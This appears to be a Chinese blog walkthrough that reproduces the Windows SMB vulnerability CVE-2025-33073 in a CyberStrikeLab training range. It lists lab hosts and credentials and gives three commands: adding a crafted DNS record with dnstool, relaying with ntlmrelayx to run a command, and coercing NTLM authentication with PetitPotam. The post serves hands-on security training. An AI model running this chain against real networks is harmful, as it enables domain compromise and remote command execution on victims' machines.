漏洞背景
2025年6月10日,微软发布了每月例行的安全补丁更新。在此次更新中,编号为CVE-2025-33073的严重漏洞引起了业界广泛的关注和重视。微软官方对该漏洞的描述为SMB客户端特权提升漏洞。然而,经过深入分析发现,该漏洞的威胁程度远远超出了普通意义上的“权限提升”范畴。
图片
环境搭建
目前CyberStrikeLab仿真平台已支持漏洞复现,现在访问即可限时免费轻松复现~
靶机地址:https://www.cyberstrikelab.com/#/scene/detail/42
- 攻击机器kali:10.6.6.10 (所有需要用到的工具均已集成在机器中)
- 受害机器:10.6.6.88(CS.cyberstrikelab.com)
- DC:10.6.6.55 (DC.cyberstrikelab.com)
复现步骤
1.打开平台,点击开启仿真环境靶机
地址:https://www.cyberstrikelab.com/#/scene/detail/42
图片
2.开启后下载openvpn配置文件并连接openvpn
图片
3.使用ssh工具连接攻击机器kali
图片
4.添加一条DNS记录
python3 dnstool.py -u cyberstrikelab.com\\cslab -p "cs1ab@wwe" -r CS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 10.6.6.10 --action add 10.6.6.55
图片
5.启动监听
python3 ntlmrelayx.py -t 10.6.6.88 -smb2support -ts -c whoami
图片
6.进行强制NTLM认证
python3 PetitPotam.py -d cyberstrikelab.com -u cslab -p cs1ab@wwe CS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 10.6.6.88
图片
7.回显命令
图片
当然这里我们也给大家准备了flag,大家可以在平台上提交
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...